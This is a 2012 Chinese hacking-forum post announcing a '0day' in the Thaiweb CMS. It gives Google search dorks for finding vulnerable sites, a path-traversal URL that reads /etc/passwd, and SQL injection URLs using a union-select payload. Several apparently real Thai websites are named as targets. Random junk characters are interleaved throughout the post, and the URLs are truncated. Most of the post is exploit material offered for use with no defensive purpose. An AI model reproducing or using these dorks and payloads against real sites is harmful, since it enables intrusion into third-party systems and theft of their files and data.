中国网络渗透测试联盟
标题:
Thaiweb远程文件sql注入漏洞0day
[打印本页]
作者:
admin
时间:
2012-12-27 08:38
标题:
Thaiweb远程文件sql注入漏洞0day
Google之:
% @$ |7 X1 C; ^
+ K' `5 ?" a1 n- K
intext:powered by Thaiweb
( R0 h9 o2 {1 M! w
; M! T. y4 r Q! }, r
inurl:index.php?page=board.php
5 A5 E9 w. B" a* a( O2 v9 u
z0 S& s/ K# W
: L+ j2 k9 i5 _
7 t% v) M i! G" |. E' x1 e" U
利用点1:
http://www.xfack.com/index.php?p ... ../../../etc/passwd
% ~% ]. x! q% [: `
* S3 Y: P! {; }6 s6 o
$ ]( i$ L) H( T& s* X9 J# J- ~
5 |/ U, ^- }% K! p' S, s3 V# P" b
利用点2:
http://www.xfack.com/index.php?page=boardque.php&bod_id=4'
& Y# K3 o) \: Y
1 h5 B3 ]/ H; }, B; s7 ^0 b
2 Z& u( g+ d5 `8 Z
0 R7 m* @) D( m' m$ ^
http://www.keytasin.com//index.p ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
- l6 c2 O) Q9 S! _# k) S
! s) v( a3 d: o4 j
http://www.autopartnerthailand.c ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
# f m( x* h' w' A* y) P ]* Q/ m1 y
* u6 O8 K: M' K# F
http://gift.in.th/index.php?page ... d=-4+union+select+1
,2,3,4,5,6,7,8,9,10,11,12,13,14,316--
/ m5 X- \% R, K7 F3 p) I' W, m4 P
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2